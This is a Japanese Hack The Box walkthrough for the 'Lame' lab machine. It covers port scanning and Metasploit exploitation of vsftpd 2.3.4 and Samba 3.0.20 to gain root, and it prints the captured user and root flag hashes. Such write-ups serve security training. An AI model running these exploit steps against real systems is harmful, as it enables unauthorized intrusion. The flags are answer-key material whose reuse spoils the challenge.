【Hack The Box】Lame Walkthrough
はじめに
ポートスキャン
ポートスキャンを実行。
# nmap -A 10.10.10.3
21(ftp)、22(ssh)、139(netbios-ssn)、445(netbios-ssn)が開いている。
vsftpd 2.3.4の調査
21番ポートで検出したvsftpd 2.3.4のエクスプロイトコードを探してみる。
# searchsploit vsftpd 2.3.4
Metasploitにエクスプロイトコードがあるようだ。
# msfconsole msf5 > search vsftpd 2.3.4 msf5 > use exploit/unix/ftp/vsftpd_234_backdoor msf5 > set RHOSTS 10.10.10.3 msf5 > show options msf5 > exploit
コードは実行できたが、セッションが確立できなかったので失敗。 別のポートを調査する。
Samba smbd 3.0.20の調査
445番ポートで検出したSamba smbd 3.0.20のエクスプロイトコードを探してみる
# searchsploit samba 3.0.20
これもMetasploitにエクスプロイトコードがあるようだ。
# msfconsole msf5 > search samba 3.0.20 msf5 > use exploit/multi/samba/usermap_script msf5 > set RHOSTS 10.10.10.3 msf5 > set RPORT 445 msf5 > exploit
※payloadを指定しないとMetasploitが判断して勝手に設定してくれる。
エクスプロイトコード実行後、rootとして任意のコマンドが実行できるようになった。 後は以下の流れでuser.txtとroot.txtの中身が取得できた。
cd /home ls cd makis ls cat user.txt cd /root ls cat root.txt
user.txt:69454a937d94f5f0225ea00acd2e84c5
root.txt:92caac3be140ef409e45721348a4e9df